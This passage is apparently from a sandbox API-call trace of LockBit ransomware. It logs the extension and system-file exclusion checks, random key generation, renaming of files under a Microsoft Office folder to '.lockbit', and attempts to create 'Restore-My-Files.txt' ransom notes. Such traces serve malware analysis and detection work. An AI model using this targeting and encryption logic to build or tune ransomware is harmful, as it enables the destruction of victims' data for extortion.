(lpString1=".hlp", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.836] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.836] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.836] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00204_.WMF") returned 1 [0118.836] lstrcmpiW (lpString1="ntldr", lpString2="IN00204_.WMF") returned 1 [0118.836] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00204_.WMF") returned 1 [0118.836] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00204_.WMF") returned -1 [0118.836] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00204_.WMF") returned -1 [0118.836] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00204_.WMF") returned 1 [0118.836] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00204_.WMF") returned -1 [0118.836] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.836] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF") returned=".WMF" [0118.836] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.836] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.836] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.837] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.838] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.838] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.838] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.838] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.838] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.lockbit") returned 72 [0118.838] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00204_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.839] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.839] malloc (_Size=0x40068) returned 0x3e70008 [0118.839] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1848) returned 1 [0118.839] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.839] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.840] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.840] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.845] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.845] malloc (_Size=0xa6) returned 0x77d7a8 [0118.845] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.846] free (_Block=0x77d7a8) [0118.846] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00204_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.846] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.846] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.846] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ede100, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x61cf3090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x98ede100, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x2bb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00233_.WMF", cAlternateFileName="")) returned 1 [0118.846] lstrcmpiW (lpString1=".", lpString2="IN00233_.WMF") returned -1 [0118.846] lstrcmpiW (lpString1="..", lpString2="IN00233_.WMF") returned -1 [0118.846] PathFindExtensionW (pszPath="IN00233_.WMF") returned=".WMF" [0118.846] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.846] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.847] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.848] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.848] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00233_.WMF") returned 1 [0118.849] lstrcmpiW (lpString1="ntldr", lpString2="IN00233_.WMF") returned 1 [0118.849] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00233_.WMF") returned 1 [0118.849] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00233_.WMF") returned -1 [0118.849] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00233_.WMF") returned -1 [0118.849] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00233_.WMF") returned 1 [0118.849] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00233_.WMF") returned -1 [0118.849] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.849] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF") returned=".WMF" [0118.849] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.849] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.849] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.850] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.851] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.851] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.851] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.851] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.851] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF.lockbit") returned 72 [0118.851] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00233_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.858] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.858] malloc (_Size=0x40068) returned 0x3df0008 [0118.858] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11190) returned 1 [0118.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0118.859] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0118.860] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0118.864] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.864] malloc (_Size=0xa6) returned 0x77d7a8 [0118.864] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.865] free (_Block=0x77d7a8) [0118.865] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00233_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.866] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.866] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.866] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6428b00, ftCreationTime.dwHighDateTime=0x1bd4af3, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6428b00, ftLastWriteTime.dwHighDateTime=0x1bd4af3, nFileSizeHigh=0x0, nFileSizeLow=0x764, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00343_.WMF", cAlternateFileName="")) returned 1 [0118.866] lstrcmpiW (lpString1=".", lpString2="IN00343_.WMF") returned -1 [0118.866] lstrcmpiW (lpString1="..", lpString2="IN00343_.WMF") returned -1 [0118.866] PathFindExtensionW (pszPath="IN00343_.WMF") returned=".WMF" [0118.866] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.866] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.867] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.867] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.868] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00343_.WMF") returned 1 [0118.869] lstrcmpiW (lpString1="ntldr", lpString2="IN00343_.WMF") returned 1 [0118.869] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00343_.WMF") returned 1 [0118.869] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00343_.WMF") returned -1 [0118.869] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00343_.WMF") returned -1 [0118.869] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00343_.WMF") returned 1 [0118.869] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00343_.WMF") returned -1 [0118.869] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.869] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF") returned=".WMF" [0118.869] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.869] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.869] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.870] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.870] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.lockbit") returned 72 [0118.870] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00343_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0118.880] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.880] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.880] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1892) returned 1 [0118.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.882] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.890] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.890] malloc (_Size=0xa6) returned 0x77d7a8 [0118.890] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.891] free (_Block=0x77d7a8) [0118.891] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00343_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.891] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.891] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, 